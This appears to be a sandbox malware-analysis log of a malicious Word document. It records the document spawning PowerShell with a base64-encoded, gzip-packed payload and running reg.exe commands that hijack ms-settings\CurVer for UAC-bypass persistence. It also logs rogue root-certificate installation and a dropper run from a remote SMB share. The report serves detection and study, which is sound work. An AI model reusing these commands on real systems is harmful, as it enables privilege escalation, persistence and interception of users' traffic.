Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBEAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAHsACgAKACAAIAAgACAAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ACgAgACAAIAAgAFAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJAAoAFQAaAByAG8AdwAoACIALQBiAHkAdABlAEEAcgByAGEAeQAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiACkAKQAKACAAIAAgACAAKQAKACAAIAAgACAAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAFYAZQByAGIAbwBzAGUAIAAiAEcAZQB0AC0ARABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIgAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACAAIAAgACAAIAAgACAAIAAkAGcAegBpAHAAUwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABnAHoAaQBwAFMAdAByAGUAYQBtAC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApAAoAIAAgACAAIAAgACAAIAAgACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBuAHAAdQB0AC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAE8AdQB0AEEAcgByAGEAeQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAGIAeQB0AGUATwB1AHQAQQByAHIAYQB5AAoAIAAgACAAIAB9AAoAfQAKAAoAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAF8AYQByAHIAYQB5ACAAPQAgADMAMQAsADEAMwA5ACwAOAAsADAALAAwACwAMAAsADAALAAwACwANAAsADAALAAxADQAOQAsADEANAA0ACwAMQA5ADMALAAxADEANAAsADEAMwAwACwANAA4ACwAMgAwACwANgA5ACwAMQAyADcALAA0ADEALAA5ADYALAAxADAAOQAsADEAOQA5ACwAMQAzADMALAAxADEALAA1ACwAMQA0ADYALAA5ACwAMwA1ACwAMQA3ADcALAAyACwAMQAyADUALAA5ACwAMQAxADEALAAxADAAMwAsADYANgAsADcALAAxADcAMQAsADEAMgA5ACwANAA2ACwANgA4ACwANwA3ACwAMgA0ADgALAAyADUAMAAsADcAMAAsADEAOAA2ACwAMgAzADkALAA3ADYALAAxADEAOQAsADEAMQAxACwAMQAxADMALAAyADMAMQAsADEANQA4ACwAMgA0ADMALAAxADcANAAsADIAMwAzACwAOQA3ACwAMgAyADQALAAxADQAMAAsADkANAAsADQAOAAsADIAMQA3ACwAMgA0ADIALAAxADMAOAAsADgALAA4ADAALAA4ADQALAAyADIAMAAsADEAMQAzACwANAAwACwAMgAzACwAMQA0ADEALAAyADAAMgAsADEANwAzACwAMgAwADIALAAxADkANgAsADEAOAAxACwAOAAxACwAOQA4ACwANgA2ACwAMwA3ACwAMgAwADQALAAxADcANAAsADkANQAsADEANAAxACwAMgJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /fJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .omg /fJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.omg\ /fJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /fJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\Jump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InProcServer32Jump to behavior
Source: 42#U0430.LNK.0.drLNK file: ..\..\..\..\..\Desktop\42#U0430.doc
Source: C:\Windows\explorer.exeFile opened: C:\Windows\system32\MsftEdit.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 0000000B.00000002.391663210.000000001C5D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wextract.pdbH source: GB.exe, 00000004.00000002.393088212.000000013F041000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: wextract.pdb source: GB.exe, 00000004.00000002.393088212.000000013F041000.00000020.00000001.01000000.00000008.sdmp, GB.exe, 00000004.00000003.364191812.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, test2.exe.4.dr, test2.exe.10.dr
Source: Binary string: wextract.pdbGCTL source: GB.exe, 00000004.00000003.364191812.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, test2.exe.4.dr, test2.exe.10.dr
Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 0000000B.00000002.391663210.000000001C52D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdb source: powershell.exe, 0000000B.00000002.391663210.000000001C52D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdberShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.391188462.000000001A59F000.00000004.00000020.00020000.00000000.sdmp
Source: ~WRF{86B60DB8-C5A6-4CF4-9CD7-DD3E39FA8B35}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command Stop-Process -Name explorer
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBEAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAHsACgAKACAAIAAgACAAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ACgAgACAAIAAgAFAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJAAoAFQAaAByAG8AdwAoACIALQBiAHkAdABlAEEAcgByAGEAeQAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiACkAKQAKACAAIAAgACAAKQAKACAAIAAgACAAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAFYAZQByAGIAbwBzAGUAIAAiAEcAZQB0AC0ARABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIgAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACAAIAAgACAAIAAgACAAIAAkAGcAegBpAHAAUwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABnAHoAaQBwAFMAdAByAGUAYQBtAC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApAAoAIAAgACAAIAAgACAAIAAgACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBuAHAAdQB0AC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAE8AdQB0AEEAcgByAGEAeQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAGIAeQB0AGUATwB1AHQAQQByAHIAYQB5AAoAIAAgACAAIAB9AAoAfQAKAAoAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAF8AYQByAHIAYQB5ACAAPQAgADMAMQAsADEAMwA5ACwAOAAsADAALAAwACwAMAAsADAALAAwACwANAAsADAALAAxADQAOQAsADEANAA0ACwAMQA5ADMALAAxADEANAAsADEAMwAwACwANAA4ACwAMgAwACwANgA5ACwAMQAyADcALAA0ADEALAA5ADYALAAxADAAOQAsADEAOQA5ACwAMQAzADMALAAxADEALAA1ACwAMQA0ADYALAA5ACwAMwA1ACwAMQA3ADcALAAyACwAMQAyADUALAA5ACwAMQAxADEALAAxADAAMwAsADYANgAsADcALAAxADcAMQAsADEAMgA5ACwANAA2ACwANgA4ACwANwA3ACwAMgA0ADgALAAyADUAMAAsADcAMAAsADEAOAA2ACwAMgAzADkALAA3ADYALAAxADEAOQAsADEAMQAxACwAMQAxADMALAAyADMAMQAsADEANQA4ACwAMgA0ADMALAAxADcANAAsADIAMwAzACwAOQA3ACwAMgAyADQALAAxADQAMAAsADkANAAsADQAOAAsADIAMQA3ACwAMgA0ADIALAAxADMAOAAsADgALAA4ADAALAA4ADQALAAyADIAMAAsADEAMQAzACwANAAwACwAMgAzACwAMQA0ADEALAAyADAAMgAsADEANwAzACwAMgAwADIALAAxADkANgAsADEAOAAxACwAOAAxACwAOQA4ACwANgA2ACwAMwA3ACwAMgAwADQALAAxADcANAAsADkANQAsADEANAAxACwAMg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command Stop-Process -Name explorerJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBEAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAHsACgAKACAAIAAgACAAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ACgAgACAAIAAgAFAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJAAoAFQAaAByAG8AdwAoACIALQBiAHkAdABlAEEAcgByAGEAeQAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiACkAKQAKACAAIAAgACAAKQAKACAAIAAgACAAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAFYAZQByAGIAbwBzAGUAIAAiAEcAZQB0AC0ARABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIgAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACAAIAAgACAAIAAgACAAIAAkAGcAegBpAHAAUwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABnAHoAaQBwAFMAdAByAGUAYQBtAC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApAAoAIAAgACAAIAAgACAAIAAgACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBuAHAAdQB0AC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAE8AdQB0AEEAcgByAGEAeQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAGIAeQB0AGUATwB1AHQAQQByAHIAYQB5AAoAIAAgACAAIAB9AAoAfQAKAAoAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAF8AYQByAHIAYQB5ACAAPQAgADMAMQAsADEAMwA5ACwAOAAsADAALAAwACwAMAAsADAALAAwACwANAAsADAALAAxADQAOQAsADEANAA0ACwAMQA5ADMALAAxADEANAAsADEAMwAwACwANAA4ACwAMgAwACwANgA5ACwAMQAyADcALAA0ADEALAA5ADYALAAxADAAOQAsADEAOQA5ACwAMQAzADMALAAxADEALAA1ACwAMQA0ADYALAA5ACwAMwA1ACwAMQA3ADcALAAyACwAMQAyADUALAA5ACwAMQAxADEALAAxADAAMwAsADYANgAsADcALAAxADcAMQAsADEAMgA5ACwANAA2ACwANgA4ACwANwA3ACwAMgA0ADgALAAyADUAMAAsADcAMAAsADEAOAA2ACwAMgAzADkALAA3ADYALAAxADEAOQAsADEAMQAxACwAMQAxADMALAAyADMAMQAsADEANQA4ACwAMgA0ADMALAAxADcANAAsADIAMwAzACwAOQA3ACwAMgAyADQALAAxADQAMAAsADkANAAsADQAOAAsADIAMQA3ACwAMgA0ADIALAAxADMAOAAsADgALAA4ADAALAA4ADQALAAyADIAMAAsADEAMQAzACwANAAwACwAMgAzACwAMQA0ADEALAAyADAAMgAsADEANwAzACwAMgAwADIALAAxADkANgAsADEAOAAxACwAOAAxACwAOQA4ACwANgA2ACwAMwA3ACwAMgAwADQALAAxADcANAAsADkANQAsADEANAAxACwAMgJump to behavior
Source: test2.exe.4.drStatic PE information: 0xD97FD45F [Sun Aug 19 04:21:51 2085 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_000007FE895279AF push ebx; retf 11_2_000007FE895279DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_000007FE8952022D push eax; iretd 11_2_000007FE89520241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_000007FE895200BD pushad ; iretd 11_2_000007FE895200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_000007FE89520B8D push eax; ret 11_2_000007FE89520BA1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_000007FE895F7F2D pushad ; retn 1C53h11_2_000007FE895F7FB9

Persistence and Installation Behavior

barindex
Installs new ROOT certificates
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Powershell uses Background Intelligent Transfer Service (BITS)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1Jump to behavior
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: \Device\Mup\89.23.98.22\LN\GB.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\test2.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Local\Temp\persistent2\test2.exeJump to dropped file
Source: \Device\Mup\89.23.98.22\LN\GB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: \Device\Mup\89.23.98.22\LN\GB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: \Device\Mup\89.23.98.22\LN\GB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: \Device\Mup\89.23.98.22\LN\GB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
